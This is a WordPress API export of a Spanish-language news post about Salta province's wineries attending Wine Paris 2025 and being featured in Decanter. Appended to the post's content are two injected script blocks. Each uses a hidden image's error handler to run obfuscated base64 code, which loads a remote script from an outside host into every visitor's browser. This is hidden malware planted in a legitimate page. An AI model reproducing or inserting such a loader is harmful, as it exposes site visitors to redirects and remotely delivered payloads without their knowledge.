{"id":4828,"date":"2025-02-12T12:54:06","date_gmt":"2025-02-12T15:54:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4828"},"modified":"2025-08-13T23:40:50","modified_gmt":"2025-08-14T02:40:50","slug":"salta-presente-en-wine-paris-una-nueva-oportunidad-para-posicionar-la-ruta-del-vino-de-altura-en-el-mundo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4828","title":{"rendered":"Salta presente en Wine Par\u00eds: una nueva oportunidad para posicionar la Ruta del Vino de Altura en el mundo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-7bd5d9404dc481f006f08c721cc9a83f\" style=\"background-color:#a80564\"><em>Del 10 al 12 de febrero Salta participar\u00e1 de Wine Par\u00eds 2025, el principal encuentro internacional de vinos y bebidas espirituosas mostrando al mundo el gran valor que aporta la Provincia a la oferta vitivin\u00edcola del pa\u00eds.<\/em><\/h4>\n\n\n\n<p>Salta participar\u00e1 en Wine Par\u00eds, un encuentro internacional de vinos y bebidas espirituosas que se realiza desde el 2020 y que este a\u00f1o convoca a 137 pa\u00edses, 4074 expositores y 48 pa\u00edses productores que se reunir\u00e1n en Par\u00eds desde este lunes&nbsp;10 al mi\u00e9rcoles 12 de febrero. Ocho&nbsp;bodegas salte\u00f1as participar\u00e1n para fortalecer su posicionamiento en el mercado internacional, mostrando la singularidad de los vinos de altura de la regi\u00f3n y promoviendo la oferta tur\u00edstica asociada.<\/p>\n\n\n\n<p>La ministra de Turismo y Deportes&nbsp;<strong>Manuela Arancibia<\/strong>&nbsp;subray\u00f3 la relevancia de esta participaci\u00f3n&nbsp;\u201cestar presentes en Wine Paris nos permite no solo posicionar nuestros vinos de altura en el mundo, sino tambi\u00e9n invitar a todos a descubrir las maravillas tur\u00edsticas de nuestra provincia. Salta es un destino \u00fanico para quienes buscan una experiencia integral, donde la vitivinicultura y el enoturismo se combinan perfectamente\u00bb.<\/p>\n\n\n\n<p>Adem\u00e1s de las actividades comerciales y promocionales, una de las grandes propuestas de Salta en este evento es la masterclass que se llevar\u00e1 a cabo con la editora regional para Sudam\u00e9rica de la prestigiosa revista Decanter, In\u00e9s Salpico. Esta clase, dirigida a 60 especialistas del sector, combina teor\u00eda y cata, y tiene como objetivo dar a conocer el vino del Valle Calchaqu\u00ed de una manera pr\u00e1ctica, amena y pedag\u00f3gica.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15969-salta-presente-en-wine-paris.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15969-salta-presente-en-wine-paris.webp\" alt=\"Salta presente en Wine Par\u00eds\"\/><\/a><\/figure>\n\n\n\n<p>La Provincia tambi\u00e9n participar\u00e1 de la recepci\u00f3n que llevar\u00e1 adelante la Embajada de Argentina en Francia junto al Gobierno de la provincia de Mendoza en el marco de la Wine Par\u00eds 2025.<\/p>\n\n\n\n<p><strong>Salta: destacada por la famosa revista especializada Decanter<\/strong><\/p>\n\n\n\n<p>Salta ha sido reconocida en la edici\u00f3n de febrero de Decanter, una de las revistas m\u00e1s prestigiosas del mundo vitivin\u00edcola. En un art\u00edculo titulado \u00abSalta, vitivinicultura extrema en Argentina\u00bb, se pone en valor la calidad de los vinos salte\u00f1os, destacando a la provincia como el punto m\u00e1s alto de producci\u00f3n vitivin\u00edcola del mundo, con vi\u00f1edos que oscilan entre los 1530 y 3111 metros sobre el nivel del mar. Este art\u00edculo es un testimonio del creciente inter\u00e9s internacional por los vinos de Salta y refuerza la visibilidad de la provincia en el \u00e1mbito global.<\/p>\n\n\n\n<p>La participaci\u00f3n de Salta en Wine Paris, sumada al art\u00edculo en Decanter, refleja el continuo esfuerzo por consolidar a Salta como un referente en la vitivinicultura mundial y un destino enotur\u00edstico de primer nivel.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 10 al 12 de febrero Salta participar\u00e1 de Wine Par\u00eds 2025, el principal encuentro internacional de vinos y bebidas espirituosas mostrando al mundo el gran valor que aporta la Provincia a la oferta vitivin\u00edcola del pa\u00eds. Salta participar\u00e1 en Wine Par\u00eds, un encuentro internacional de vinos y bebidas espirituosas que se realiza desde el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4829,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,24],"tags":[],"class_list":{"0":"post-4828","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-bodegas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4828"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4828"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4828\/revisions"}],"predecessor-version":[{"id":6574,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4828\/revisions\/6574"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4829"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}